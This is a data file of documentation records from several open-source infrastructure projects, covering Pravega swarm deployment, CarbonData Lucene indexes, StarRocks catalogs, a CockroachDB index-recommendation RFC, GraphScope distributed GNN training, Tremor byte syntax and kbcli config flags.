deployed using `zookeeper.yml`/`hdfs.yml`. Your clients must then be deployed into the swarm, using the following command. ``` docker service create --name=myapp --network=pravega_default mycompany/myapp ``` The crucial bit being ``` --network=pravega_default. ``` Your client should talk to Pravega at ``` tcp://controller:9090. ``` If you intend to run clients outside the swarm, you must provide two additional environment variables, `PUBLISHEDADDRESS` and `LISTENINGADDRESS`. `PUBLISHED_ADDRESS` must be an IP or Hostname that resolves to one or more swarm nodes (or a load balancer that sits in front of them). `LISTENING_ADDRESS` should always be `0`, or `0.0.0.0`. ``` PUBLISHEDADDRESS=1.2.3.4 LISTENINGADDRESS=0 ZKURL=zookeeper:2181 HDFSURL=hdfs:8020 docker stack up --compose-file pravega.yml pravega ``` As above, `ZKURL` and `HDFSURL` can be omitted if the services are at their default locations. Your client should talk to Pravega at ``` tcp://${PUBLISHED_ADDRESS}:9090`. ``` BookKeeper can be scaled up or down using the following command. ``` docker service scale pravega_bookkeeper=N ``` As configured in this package, Pravega requires at least 3 BookKeeper nodes, (i.e., N must be >= 3.) Pravega Controller can be scaled up or down using the following command. ``` docker service scale pravega_controller=N ``` If you app will run inside the swarm and you didn't run with `PUBLISHED_ADDRESS`, you can scale the Segment Store the usual way using the following command. ``` docker service scale pravega_segmentstore=N ``` If you require access to Pravega from outside the swarm and have deployed with `PUBLISHED_ADDRESS`, each instance of the Segment Store must be deployed as a unique service. This is a cumbersome process, but we've provided a helper script to make it fairly painless: ``` ./scale_segmentstore N ``` All services, (including HDFS and ZooKeeper if you've deployed our package) can be destroyed using the following command. ``` docker stack down pravega ```" } ]
{ "category": "App Definition and Development", "file_name": "lucene-index-guide.md", "project_name": "Apache CarbonData", "subcategory": "Database" }
[ { "data": "<!-- Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> Lucene Index can be created using following DDL ``` CREATE INDEX [IF NOT EXISTS] index_name ON TABLE maintable (indexcolumns) AS 'lucene' [PROPERTIES ('key'='value')] ``` index_columns is the list of string columns on which lucene creates indexes. Index can be dropped using following DDL: ``` DROP INDEX [IF EXISTS] index_name ON [TABLE] main_table ``` To show all Indexes created, use: ``` SHOW INDEXES ON [TABLE] main_table ``` It will show all Indexes created on the main table. NOTE: Keywords given inside `[]` is optional. Lucene is a high performance, full featured text search engine. Lucene is integrated to carbon as an index and managed along with main tables by CarbonData. User can create lucene index to improve query performance on string columns which has content of more length. So, user can search tokenized word or pattern of it using lucene query on text content. For instance, main table called index_test which is defined as: ``` CREATE TABLE index_test ( name string, age int, city string, country string) STORED AS carbondata ``` User can create Lucene index using the Create Index DDL: ``` CREATE INDEX dm ON TABLE index_test (name,country) AS 'lucene' ``` Properties FLUSH_CACHE: size of the cache to maintain in Lucene writer, if specified then it tries to aggregate the unique data till the cache limit and flush to Lucene. It is best suitable for low cardinality dimensions. SPLIT_BLOCKLET: when made as true then store the data in blocklet wise in lucene , it means new folder will be created for each blocklet, thus, it eliminates storing blockletid in lucene and also it makes lucene small chunks of data. When loading data to main table, lucene index files will be generated for all the index_columns(String Columns) given in CREATE statement which contains information about the data location of index_columns. These index files will be written inside a folder named with index name inside each segment folder. A system level configuration `carbon.lucene.compression.mode` can be added for best compression of lucene index files. The default value is speed, where the index writing speed will be" }, { "data": "If the value is compression, the index file size will be compressed. As a technique for query acceleration, Lucene indexes cannot be queried directly. Queries are to be made on the main table. When a query with TEXT_MATCH('name:c10') or TEXTMATCHWITH_LIMIT('name:n10',10)[the second parameter represents the number of result to be returned, if user does not specify this value, all results will be returned without any limit] is fired, two jobs will be launched. The first job writes the temporary files in folder created at table level which contains lucene's search results and these files will be read in second job to give faster results. These temporary files will be cleared once the query finishes. User can verify whether a query can leverage Lucene index or not by executing the `EXPLAIN` command, which will show the transformed logical plan, and thus user can check whether TEXT_MATCH() filter is applied on query or not. Note: The filter columns in TEXTMATCH or TEXTMATCHWITHLIMIT must be always in lowercase and filter conditions like 'AND','OR' must be in upper case. Ex: ``` select from index_test where TEXT_MATCH('name:10 AND name:n') ``` Query supports only one TEXT_MATCH udf for filter condition and not multiple udfs. The following query is supported: ``` select from index_test where TEXT_MATCH('name:10 AND name:n') ``` The following query is not supported: ``` select from index_test where TEXT_MATCH('name:10) AND TEXT_MATCH(name:n') ``` Below `like` queries can be converted to text_match queries as following: ``` select * from index_test where name='n10' select * from index_test where name like 'n1%' select * from index_test where name like '%10' select * from index_test where name like '%n%' select * from index_test where name like '%10' and name not like '%n%' ``` Lucene TEXT_MATCH Queries: ``` select * from indextest where TEXTMATCH('name:n10') select from index_test where TEXT_MATCH('name:n1') select from index_test where TEXT_MATCH('name:10') select from index_test where TEXT_MATCH('name:n*') select from index_test where TEXT_MATCH('name:10 -name:n') ``` Note: For lucene queries and syntax, refer to Once there is a lucene index created on the main table, following command on the main table is not supported: Data management command: `UPDATE/DELETE`. Schema management command: `ALTER TABLE DROP COLUMN`, `ALTER TABLE CHANGE DATATYPE`, `ALTER TABLE RENAME`. Note: Adding a new column is supported, and for dropping columns and change datatype command, CarbonData will check whether it will impact the lucene index, if not, the operation is allowed, otherwise operation will be rejected by throwing exception. Partition management command: `ALTER TABLE ADD/DROP PARTITION`. However, there is still way to support these operations on main table, in current CarbonData release, user can do as following: Remove the lucene index by `DROP INDEX` command. Carry out the data management operation on main table. Create the lucene index again by `CREATE INDEX` command. Basically, user can manually trigger the operation by refreshing the index." } ]
{ "category": "App Definition and Development", "file_name": "SHOW_CATALOGS.md", "project_name": "StarRocks", "subcategory": "Database" }
[ { "data": "displayed_sidebar: \"English\" Query all catalogs in the current StarRocks cluster, including the internal catalog and external catalogs. NOTE SHOW CATALOGS returns external catalogs to users who have the USAGE privilege on that external catalog. If users or roles do not have this privilege on any external catalog, this command returns only the default_catalog. ```SQL SHOW CATALOGS ``` ```SQL +-+--+-+ | Catalog | Type | Comment | +-+--+-+ ``` The following table describes the fields returned by this statement. | Field | Description | | - | | | Catalog | The catalog name. | | Type | The catalog type. `Internal` is returned if the catalog is `default_catalog`. The corresponding catalog type is returned if the catalog is an external catalog, such as `Hive`, `Hudi`, or `Iceberg`. | | Comment | The comments of a catalog. StarRocks does not support adding comments to an external catalog. Therefore, the value is `NULL` for an external catalog. If the catalog is `defaultcatalog`, the comment is `An internal catalog contains this cluster's self-managed tables.` by default. `defaultcatalog` is the only internal catalog in a StarRocks cluster. | Query all catalogs in the current cluster. ```SQL SHOW CATALOGS\\G row * Catalog: default_catalog Type: Internal Comment: An internal catalog contains this cluster's self-managed tables. row * Catalog: hudi_catalog Type: Hudi Comment: NULL row * Catalog: iceberg_catalog Type: Iceberg Comment: NULL ```" } ]
{ "category": "App Definition and Development", "file_name": "spicule.md", "project_name": "Beam", "subcategory": "Streaming & Messaging" }
[ { "data": "title: \"Spicule\" icon: /images/logos/powered-by/spicule.png hasLink: \"https://www.spicule.co.uk/posts/welcome\" <!-- Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. -->" } ]
{ "category": "App Definition and Development", "file_name": "chapter3-similarity-search.md", "project_name": "YugabyteDB", "subcategory": "Database" }
[ { "data": "Set the rank to 7, select the Comedy genre and ask the following question: ```text What are the funniest comedy movies worth watching? ```" } ]
{ "category": "App Definition and Development", "file_name": "20211112_index_recommendation.md", "project_name": "CockroachDB", "subcategory": "Database" }
[ { "data": "Feature Name: Index Recommendation Engine Status: in-progress Start Date: 2018-10-18 Authors: Neha George RFC PR: Cockroach Issue: This document describes an \"index recommendation engine\" that would suggest table indexes for CockroachDB users to add. As of now, users do not have insight regarding the contribution of indexes to their workload's performance. This will be done by strategically selecting index subsets that could improve performance, and then using the optimizer costing algorithm to determine the best overall subset. The potential impact of this project is boundless, as every user could see a boost in their workload's performance. The main motivation behind this project is to capitalize on CockroachDB's performance potential. Adding certain indexes can have drastic impacts on the performance of a query, and if this said query is executed repeatedly, the performance discrepancy is all the more important. Index recommendation is universally applicable, meaning that this project could be used by all customers. The expected outcome is improved query performance on average. The PMs in this area are Kevin Ngo and Vy Ton. There are existing user stories, linked . The tentative plan is to start with manual single-statement index recommendations of indexes to add to the database, including index recommendations with STORING columns (to potentially avoid lookup joins). This functionality will then be extended to workload recommendations of indexes to add. From here, automatic recommendations of indexes to add and indexes to drop can be considered. To begin, we will have a single-statement index recommendation feature. This will be implemented first as the logic it uses can be expanded to support workload-level recommendations, discussed next in the RFC. The feature will output recommendations of indexes to add that will optimize a given query, which lends well to having it included with the `EXPLAIN` syntax, below the query plan. There will be index recommendations in a table format, including the index columns, their direction, and SQL command to run to add each index. For a single statement, the flow is planned as follows: Run the optbuilder's build function and walk through the statement to determine potential candidates, ensuring they do not already exist as indexes and that there are no duplicates. Add hypothetical indexes for each of the potential candidates for which an index does not already exist. Run the optimizer with these hypothetical indexes included and determine which potential candidates (if any) are actually being used in the optimal plan to find the \"recommendation set.\" Connect this flow to the `EXPLAIN` output, showing the final recommendation set. These ideas will be extended for workload recommendations, with the fundamental recommendation set and hypothetical index concepts being reused. In the background, we collect SQL statements that are executed by the user. This is stored in an existing table, `crdbinternal.statementstatistics`. Information regarding execution count and latencies, which will be used to assess a statement's tuning priority, can be obtained from this table. There are three proposed interfaces, which will be implemented in the given order. There is a new built-in function for index recommendations that takes in no parameters, called" }, { "data": "It generates index recommendations for the current database. Using the collected SQL statements, we then run the index recommendation algorithm that takes the SQL statements as input and outputs index recommendations. The index recommendations will populate a new `crdbinternal.indexrecommendations` virtual table, stored in memory, with the following columns: `createdate`, `table`, `columns`, and `storedcolumns`, which can then later be queried. The data types of the columns would be as follows: `create_date`: TIMESTAMPTZ `table`: INT_8 (table ID) `columns`: an array of JSONB with each entry storing a column's column ID (INT_8) and direction (boolean representing ascending or descending). `storedcolumns`: an array of integers with each column ID (INT8) We generate and surface index recommendations in the DB and CC console. There would be a UI showing the recommendations of indexes to create and drop in a table view, with an associated impact score or metric. How this metric is determined is uncertain, but it would be based on the frequency of that index's use in the workload and its cost-impact on the statements which use it. We automatically run the index recommendation algorithm periodically in the background and tune the database without user input. This is an end goal, after we have refined our index recommendations and are confident in them. Similar to statistics creation, this would become a job that runs in the background. The frequency of this would be configurable, and would also depend on the activity levels of the database (i.e. only run when there is low activity). For a given user database no matter what the interface, a sample workload W must be determined, from which index recommendations can be decided. W contains the top x DML statements ordered by execution count times the statement latency, where x must be high enough to ensure that the sum of statementlatency*executioncount is beyond some threshold. If this is not possible, we return an error to the user stating that there is not enough information to recommend indexes. This is operating under the claim that indexes can only benefit and adversely impact DML-type statements. Next we determine each statement's corresponding index recommendation set, if the statement has one (otherwise it will just be the empty set). These statement recommendation sets are sets of indexes that are tailored to the statement and will potentially be recommended to the user to improve overall workload performance. A statement will have a recommendation set if and only if it benefits from the addition of indexes. From here, the optimizer costing algorithm is used to determine which amalgamated index set should be recommended to the user. There are a large number of possible indexes for a given statement (S) that uses one or more tables, so we choose a candidate set . Choose S's candidate set as follows: Separate attributes that appear in S into 5 categories: J: Attributes that appear in JOIN conditions R: Attributes that appear in range or comparison conditions EQ: Attributes that appear in EQUAL conditions O: Attributes that appear in GROUP BY or ORDER BY clauses USED: Attributes that are referenced anywhere in the statement that are not in the above" }, { "data": "Note that in order to access this information, we need to parse the statement string and build the canonical expression so that `tree.UnresolvedName` types are resolved. Using these categories, follow a set of rules to create candidate indexes. For succinctness, only some rules are listed. These indexes are all ascending, other than multi-columned indexes created from an ORDER BY, where each column will depend on the direction of the ordering. By default, the first column will be ordered ascending. If that contradicts its natural ordering, then all columns in the index will do the same, and vice versa. This is to avoid redundant indexes. When O attributes come from a single table, create an index using all attributes from that ordering/grouping. Create single-attribute indexes from J, R, and EQ. If there are join conditions with multiple attributes from a single table, create a single index on these attributes. Inject these indexes as hypothetical indexes into the schema and optimize the single statement (more information about hypothetical indexes in the following section). Take every index that was used in the optimal plan and put it in this statement's recommendation set. Consider this sample SQL query: ```sql SELECT a FROM s JOIN t ON s.x = t.x WHERE (s.x = s.y AND t.z > 10 AND t.z < 20) ORDER BY s.y, s.z; ``` From this query and the rules listed, we would have for table s indexes: ``` J: (x) EQ: (x), (y) O: (y, z) ``` For table t: ``` J: (x) R: (z) ``` From here, we would construct the recommendation set of the query, which could result in indexes on either table, on no table, or on both tables. The reason not all candidate indexes are included is due to the fact that we only choose indexes used in the optimizer's best query plan. To reiterate, the recommendation set depends on the plan chosen by the optimizer, while the candidate set does not. The next step is applying the optimizer costing algorithm to determine the best set of indexes for the given workload W. That is, find a set of indexes X such that Cost(W, X) is minimized. For each statement's recommendation set, determine the optimizer cost of W if that index subset were to be applied. Choose the statement recommendation sets with the lowest Cost(W, X). We must then check for index overlap and remove similar/identical indexes to avoid redundancy. An example of two similar indexes is having an index on `(x, y)` and then also having an index on `(x, y, z)`. A strategy to determine which index to remove would be running W again with our chosen indexes, and of the redundant indexes choose the one that has the highest worth. Meaning, the sum of the frequencies of the statements in which the index is used is the highest. When we re-run W, we should also remove any chosen indexes that are unused. At this time, potential indexes can be compared with existing indexes. If indexes we want to recommend include existing indexes, we omit those" }, { "data": "In the case that no indexes remain, it means that no indexes will be recommended to the user to add. In a similar way, if the addition of our hypothetical indexes caused some existing indexes to become unused or rarely used, we would recommend that these indexes be deleted. If the index is still occasionally used, we need to ensure that removing it does not negatively affect overall performance. There would be some heuristics we make use of to do this. To fully ensure that this has not caused a regression however, we should re-run W with the index hypothetically dropped. Additionally, before we delete an index, we should ensure that no queries are regularly using hints to force that index. After this step, we have our optimal X that will be recommended to the user. In terms of the final output, we will have recommended indexes, if these recommendations exist. In addition, we should have a quantifiable \"impact score\" associated with an index recommendation that we can use to justify why the index would be beneficial to users. We can also include further information with this, such as which queries are affected and/or affected the most. For \"drop\" recommendations, we should have a similar metric. One issue with this approach is that it can become a feedback loop where adding new indexes affects the existing query plans, so we remove them, and then that allows for new potential indexes to be useful. The existence of this feedback loop means that the final recommendation set may not be the most optimal. This is a tradeoff that must be accepted - otherwise the algorithm could run infinitely. Plus, even if the recommendation set is not the most optimal, it will have still been proven to improve the sample workload performance, which is beneficial. Another heuristic that could be added is random swapping of a small subset of indexes being tried with other indexes that were found in W's recommendation sets. If the total cost of W is lower with this random swapping, we keep this configuration and continue as described above. The number of times this would be tried would be limited, to avoid having an inefficient algorithm. Implementation will begin with recommending potential indexes to add, followed by recommending indexes to remove. As an aside, we can also independently use index usage metrics to determine if there are any unused indexes that we should recommend be deleted. An additional issue is the lack of histograms on non-indexed columns. This will impact the plan that is chosen by the optimizer. Since statistics collection is a long and involved task, there is no clear way of mitigating this. Instead, this is a limitation that we must accept for now, especially since this will not stop us from making recommendations (it will just potentially impact their quality). It might be beneficial to also factor in the cost of index writes and index creation in our recommendation algorithm, which is not done by the optimizer's costing" }, { "data": "For database reads, indexes can only have positive impact, whereas for writes, they can have a negative impact. Also, creating an index has a storage cost. Deciding a fair cost to associate with creating an index and maintaining an index for database writes is a pending task. This is largely dependent on user preference, as some users might prioritize read performance over write performance, and vice versa. To handle this, we could have user settings that allow the user to indicate their preference, which will then affect the cost we use internally. These user settings should be specific to each \"application name\", to deal with the fact that some applications may be more latency-sensitive than others. Furthermore, creating and removing indexes has significant overhead, so we will use hypothetical indexes instead. There is an existing for this. However, these indexes persist to disk, and for our purposes, we only need the indexes in memory. We will need to additionally create fake tables that we can tamper with, without interfering with planning on concurrent queries. The implementation idea is to create a struct that wraps `optTable` with additional information pertaining to the table's hypothetical indexes. Our hypothetical indexes will be added and removed from this table, that is otherwise identical to the regular table. Moreover, when recommending the removal of indexes we must be cautious with `UNIQUE` indexes. If a unique index already exists, we have to ensure that we do not remove the unique constraint. This can easily be done by keeping unique indexes. For additional flexibility, however, we could consider adding a `UNIQUE WITHOUT INDEX` constraint, which would allow the unique index's removal. Running the costing algorithm so many times is another hurdle in terms of computational cost. We run the algorithm for each statement in W, for each statement's recommendation set, which is O(cardinality of W, squared) time. Since the queries we are concerned with are a subset of the statements in W, the time complexity is not a tight upper bound. However, it shows that this algorithm has roughly quadratic time complexity, which is quite slow. A way of mitigating this is by only allowing the recommendation algorithm to be run if database utilisation is below a certain threshold, similar to what Azure does . Another way of mitigating this is by ensuring the sample workload is a meaningful sample which is not too large. We do this by limiting the size of the sample workload when we fetch it. If performance continues to be an issue, which is highly applicable for auto-tuning, this functionality can be disabled. Alternatively, a setting can be configured to tune the database less frequently. When considering serverless' pricing based on RU consumption, this type of flexibility is vital. Finally, a general issue with this project would be recommending indexes that slow down overall performance. In theory, with proper design, this should not be a major issue. Albeit, there are cases in which this would happen. Since maintaining an index has an associated cost, it's not always beneficial to add more indexes. Thus, a certain middle ground must be" }, { "data": "It is possible that this middle ground is most optimal for the SQL statements considered when choosing recommendations, but in practice the workload's demands could fluctuate. Determining useful index recommendations in such a situation is a difficult task. Still, in most cases, one can expect the workload's general characteristics to be consistent. Also, index recommendations would only be made if there is enough sample data to do so. Meaning, index recommendations would always be based on patterns observed in a significant sample size. For the single-statement recommendations, another suggested interface was adding index recommendations to a separate `EXPLAIN` option, as opposed to adding it to a vanilla `EXPLAIN`. An advantage of this is it avoids cluttering the `EXPLAIN` output with unexpected information. However, this would add new syntax that could confuse users. It would also reduce the visibility of the feature, and since users who run `EXPLAIN` often want to see how the plan can be improved, having index recommendations in the same view would be helpful. Thus, it was decided that this would be included in the vanilla `EXPLAIN`. To determine the statement recommendation set, a simpler heuristic could easily be used. For example, the candidate set could be all single column indexes for attributes that appear in the query. The recommendation set would still be determined by running the optimizer with all indexes in the candidate set added. The reason this more involved method is chosen is that it considers more complex indexes that could potentially further improve performance. Another portion of the algorithm is the optimizer costing. A viable alternative to this, seen in modern literature, would be using ML-based modelling to choose indexes from statement recommendation sets. However, this seemed like overkill for our purposes. Although an impressive feat in academia, a simpler algorithm using our existing optimizer infrastructure can achieve largely the same goal. Thus, it made sense to use our optimizer costing algorithm. The impact of not doing this project at all is significant since established databases offer index recommendation. In not doing so, we are missing an important feature that some consumers expect. Will the engine recommend partial indexes, inverted indexes, or hash-sharded indexes? This algorithm will not consider these types of indexes to begin with as determining heuristics to recommend them is more difficult (notably partial and hash-sharded indexes). This could be an extension in the future. A known limitation with not recommending hash-sharded indexes is the potential creation of hotspot ranges, see this . How will we cost writes and index creation?. This is TBD. General ideas can be determined experimentally, as development of this feature is underway. One can create test data, SQL write statements and SQL queries in order to determine an index creation and update costing mechanism that makes sense. Could we recommend changes other than adding or removing indexes? Although this RFC deals with index recommendation specifically, there are other ways to tune the database to optimize performance. For example, in a multi-region database, we could recommend the conversion of regional tables to global tables (and vice versa). These types of additional recommendations can be explored in the future, in a separate RFC. [1] http://www.cs.toronto.edu/~alan/papers/icde00.pdf [2] https://baozhifeng.net/papers/cikm20-IndexRec.pdf" } ]
{ "category": "App Definition and Development", "file_name": "tutorial_node_classification_pyg_k8s.md", "project_name": "GraphScope", "subcategory": "Database" }
[ { "data": "This tutorial presents a server-client example that illustrates how GraphScope trains the GraphSAGE model (implemented in PyG) for a node classification task on a Kubernetes cluster. ```python import graphscope as gs from graphscope.dataset import loadogbnarxiv gs.setoption(loglevel=\"DEBUG\") gs.setoption(showlog=True) params = { \"NUMSERVERNODES\": 2, \"NUMCLIENTNODES\": 2, } sess = gs.session( with_dataset=True, k8sservicetype=\"NodePort\", k8svineyardmem=\"8Gi\", k8senginemem=\"8Gi\", vineyardsharedmem=\"8Gi\", k8simagepull_policy=\"IfNotPresent\", k8simagetag=\"0.26.0a20240115-x86_64\", numworkers=params[\"NUMSERVER_NODES\"], ) g = loadogbnarxiv(sess=sess, prefix=\"/dataset/ogbn_arxiv\") ``` ```python gltgraph = gs.graphlearntorch( g, edges=[ (\"paper\", \"citation\", \"paper\"), ], node_features={ \"paper\": [f\"feat_{i}\" for i in range(128)], }, node_labels={ \"paper\": \"label\", }, edge_dir=\"out\", randomnodesplit={ \"num_val\": 0.1, \"num_test\": 0.1, }, numclients=params[\"NUMCLIENT_NODES\"], manifest_path=\"./client.yaml\", clientfolderpath=\"./\", ) print(\"Exiting...\") ``` ```yaml apiVersion: \"kubeflow.org/v1\" kind: PyTorchJob metadata: name: graphlearn-torch-client namespace: default spec: pytorchReplicaSpecs: Master: replicas: 1 restartPolicy: OnFailure template: spec: containers: name: pytorch image: registry.cn-hongkong.aliyuncs.com/graphscope/graphlearn-torch-client:0.26.0a20240115-x86_64 imagePullPolicy: IfNotPresent command: bash -c |- python3 /workspace/client.py --noderank 0 --masteraddr ${MASTERADDR} --numservernodes ${NUMSERVERNODES} --numclientnodes ${NUMCLIENT_NODES} volumeMounts: mountPath: /dev/shm name: cache-volume mountPath: /workspace name: client-volume volumes: name: cache-volume emptyDir: medium: Memory sizeLimit: \"8G\" name: client-volume configMap: name: graphlearn-torch-client-config Worker: replicas: ${NUMWORKERREPLICAS} restartPolicy: OnFailure template: spec: containers: name: pytorch image: registry.cn-hongkong.aliyuncs.com/graphscope/graphlearn-torch-client:0.26.0a20240115-x86_64 imagePullPolicy: IfNotPresent command: bash -c |- python3 /workspace/client.py --noderank $((${MYPODNAME: -1}+1)) --masteraddr ${MASTERADDR} --groupmaster ${GROUPMASTER} --numservernodes ${NUMSERVERNODES} --numclientnodes ${NUMCLIENT_NODES} env: name: GROUP_MASTER value: graphlearn-torch-client-master-0 name: MYPODNAME valueFrom: fieldRef: fieldPath: metadata.name volumeMounts: mountPath: /dev/shm name: cache-volume mountPath: /workspace name: client-volume volumes: name: cache-volume emptyDir: medium: Memory sizeLimit: \"8G\" name: client-volume configMap: name: graphlearn-torch-client-config ``` ```python import argparse import time from typing import List import torch import torch.nn.functional as F from torch.distributed.algorithms.join import Join from torch.nn.parallel import DistributedDataParallel from torch_geometric.nn import GraphSAGE import graphscope as gs import graphscope.learning.graphlearn_torch as glt from graphscope.learning.gltorchgraph import GLTorchGraph from graphscope.learning.graphlearn_torch.typing import Split gs.setoption(loglevel=\"DEBUG\") gs.setoption(showlog=True) ``` ```python @torch.no_grad() def test(model, testloader, datasetname): model.eval() xs = [] y_true = [] for i, batch in enumerate(test_loader): if i == 0: device = batch.x.device batch.x = batch.x.to(torch.float32) # TODO x = model.module(batch.x, batch.edgeindex)[: batch.batchsize] xs.append(x.cpu()) ytrue.append(batch.y[: batch.batchsize].cpu()) del batch xs = [t.to(device) for t in xs] ytrue = [t.to(device) for t in ytrue] y_pred = torch.cat(xs, dim=0).argmax(dim=-1, keepdim=True) ytrue = torch.cat(ytrue, dim=0) testacc = sum((ypred.T == ytrue.T)[0]) / len(ytrue.T) return test_acc.item() ``` ```python def runclientproc( glt_graph, group_master: str, num_servers: int, num_clients: int, client_rank: int, serverranklist: List[int], dataset_name: str, epochs: int, batch_size: int, trainingpgmaster_port: int, ): print(\"-- Initializing client ...\") glt.distributed.init_client( numservers=numservers, numclients=numclients, clientrank=clientrank, masteraddr=gltgraph.master_addr, masterport=gltgraph.serverclientmaster_port, numrpcthreads=4, clientgroupname=\"k8sgltclient\", is_dynamic=True, ) currentctx = glt.distributed.getcontext() torch.distributed.initprocessgroup( backend=\"gloo\", rank=current_ctx.rank, worldsize=currentctx.world_size, initmethod=\"tcp://{}:{}\".format(groupmaster, trainingpgmaster_port), ) device = torch.device(\"cpu\") print(\"-- Creating training dataloader ...\") train_loader = glt.distributed.DistNeighborLoader( data=None, num_neighbors=[5, 3, 2], input_nodes=Split.train, batchsize=batchsize, shuffle=True, collect_features=True, to_device=device, worker_options=glt.distributed.RemoteDistSamplingWorkerOptions( serverrank=serverrank_list, num_workers=1," }, { "data": "worker_concurrency=1, buffer_size=\"256MB\", prefetch_size=1, gltgraph=gltgraph, workload_type=\"train\", ), ) print(\"-- Creating testing dataloader ...\") test_loader = glt.distributed.DistNeighborLoader( data=None, num_neighbors=[5, 3, 2], input_nodes=Split.test, batchsize=batchsize, shuffle=False, collect_features=True, to_device=device, worker_options=glt.distributed.RemoteDistSamplingWorkerOptions( serverrank=serverrank_list, num_workers=1, worker_devices=[torch.device(\"cpu\")], worker_concurrency=1, buffer_size=\"256MB\", prefetch_size=1, gltgraph=gltgraph, workload_type=\"test\", ), ) print(\"-- Initializing model and optimizer ...\") model = GraphSAGE( in_channels=128, hidden_channels=128, num_layers=3, out_channels=47, ).to(device) model = DistributedDataParallel(model, device_ids=None) optimizer = torch.optim.Adam(model.parameters(), lr=0.001) print(\"-- Start training and testing ...\") epochs = 10 dataset_name = \"ogbn-arxiv\" for epoch in range(0, epochs): model.train() start = time.time() with Join([model]): for batch in train_loader: optimizer.zero_grad() batch.x = batch.x.to(torch.float32) # TODO out = model(batch.x, batch.edgeindex)[: batch.batchsize].log_softmax( dim=-1 ) loss = F.nllloss(out, torch.flatten(batch.y[: batch.batchsize])) loss.backward() optimizer.step() end = time.time() print(f\"-- Epoch: {epoch:03d}, Loss: {loss:04f} Epoch Time: {end - start}\") torch.distributed.barrier() if epoch == 0 or epoch > (epochs // 2): testacc = test(model, testloader, dataset_name) print(f\"-- Test Accuracy: {test_acc:.4f}\") torch.distributed.barrier() print(\"-- Shutdowning ...\") glt.distributed.shutdown_client() print(\"-- Exited ...\") ``` ```python if name == \"main\": parser = argparse.ArgumentParser( description=\"Arguments for distributed training of supervised SAGE with servers.\" ) parser.add_argument( \"--dataset\", type=str, default=\"ogbn-arxiv\", help=\"The name of ogbn arxiv.\", ) parser.add_argument( \"--numservernodes\", type=int, default=2, help=\"Number of server nodes for remote sampling.\", ) parser.add_argument( \"--numclientnodes\", type=int, default=1, help=\"Number of client nodes for training.\", ) parser.add_argument( \"--node_rank\", type=int, default=0, help=\"The node rank of the current role.\", ) parser.add_argument( \"--epochs\", type=int, default=10, help=\"The number of training epochs. (client option)\", ) parser.add_argument( \"--batch_size\", type=int, default=256, help=\"Batch size for the training and testing dataloader.\", ) parser.add_argument( \"--trainingpgmaster_port\", type=int, default=9997, help=\"The port used for PyTorch's process group initialization across all training processes.\", ) parser.add_argument( \"--trainloadermaster_port\", type=int, default=9998, help=\"The port used for RPC initialization across all sampling workers of training loader.\", ) parser.add_argument( \"--testloadermaster_port\", type=int, default=9999, help=\"The port used for RPC initialization across all sampling workers of testing loader.\", ) parser.add_argument( \"--master_addr\", type=str, default=\"localhost\", help=\"The master address of the graphlearn server.\", ) parser.add_argument( \"--group_master\", type=str, default=\"localhost\", help=\"The master address of the training process group.\", ) args = parser.parse_args() print( f\" Distributed training example of supervised SAGE with server-client mode. Client {args.node_rank} \" ) print(f\"* dataset: {args.dataset}\") print(f\"* total server nodes: {args.numservernodes}\") print(f\"* total client nodes: {args.numclientnodes}\") print(f\"* node rank: {args.node_rank}\") numservers = args.numserver_nodes numclients = args.numclient_nodes print(f\"* epochs: {args.epochs}\") print(f\"* batch size: {args.batch_size}\") print(f\"* training process group master port: {args.trainingpgmaster_port}\") print(f\"* training loader master port: {args.trainloadermaster_port}\") print(f\"* testing loader master port: {args.testloadermaster_port}\") clientrank = args.noderank print(\" Loading graph info ...\") glt_graph = GLTorchGraph( [ args.master_addr + \":9001\", args.master_addr + \":9002\", args.master_addr + \":9003\", args.master_addr + \":9004\", ] ) print(\" Launching client processes ...\") runclientproc( glt_graph, args.group_master, num_servers, num_clients, client_rank, [serverrank for serverrank in range(num_servers)], args.dataset, args.epochs, args.batch_size, args.trainingpgmaster_port, ) ``` ```shell python3 k8s_launch.py ```" } ]
{ "category": "App Definition and Development", "file_name": "bytespart.md", "project_name": "Tremor", "subcategory": "Streaming & Messaging" }
[ { "data": "The part may take the following general form ```ebnf SimpleExprImut ':' 'int' '/' Ident ``` Where: The `SimpleExprImut can be a literal or identifier to the data being encoded. A optional size in bits, or defaulted based on the data being encoded. An optional encoding hint as an identifier The size must be zero or greater, up to and including but no larger than 64 bits. |Ident|Description| ||| |`binary`|Encoded in binary, using network ( big ) endian| |`big-unsigned-integer`|Unsigned integer encoding, big endian| |`little-unsigned-integer`|Unsigned integer encoding, little endian| |`big-signed-integer`|Signed integer encoding, big endian| |`little-signed-integer`|Signed integer encoding, little endian|" } ]
{ "category": "App Definition and Development", "file_name": "kbcli_kubeblocks_config.md", "project_name": "KubeBlocks by ApeCloud", "subcategory": "Database" }
[ { "data": "title: kbcli kubeblocks config KubeBlocks config. ``` kbcli kubeblocks config [flags] ``` ``` kbcli kubeblocks config --set snapshot-controller.enabled=true ``` ``` -h, --help help for config --set stringArray Set values on the command line (can specify multiple or separate values with commas: key1=val1,key2=val2) --set-file stringArray Set values from respective files specified via the command line (can specify multiple or separate values with commas: key1=path1,key2=path2) --set-json stringArray Set JSON values on the command line (can specify multiple or separate values with commas: key1=jsonval1,key2=jsonval2) --set-string stringArray Set STRING values on the command line (can specify multiple or separate values with commas: key1=val1,key2=val2) -f, --values strings Specify values in a YAML file or a URL (can specify multiple) ``` ``` --as string Username to impersonate for the operation. User could be a regular user or a service account in a namespace. --as-group stringArray Group to impersonate for the operation, this flag can be repeated to specify multiple groups. --as-uid string UID to impersonate for the operation. --cache-dir string Default cache directory (default \"$HOME/.kube/cache\") --certificate-authority string Path to a cert file for the certificate authority --client-certificate string Path to a client certificate file for TLS --client-key string Path to a client key file for TLS --cluster string The name of the kubeconfig cluster to use --context string The name of the kubeconfig 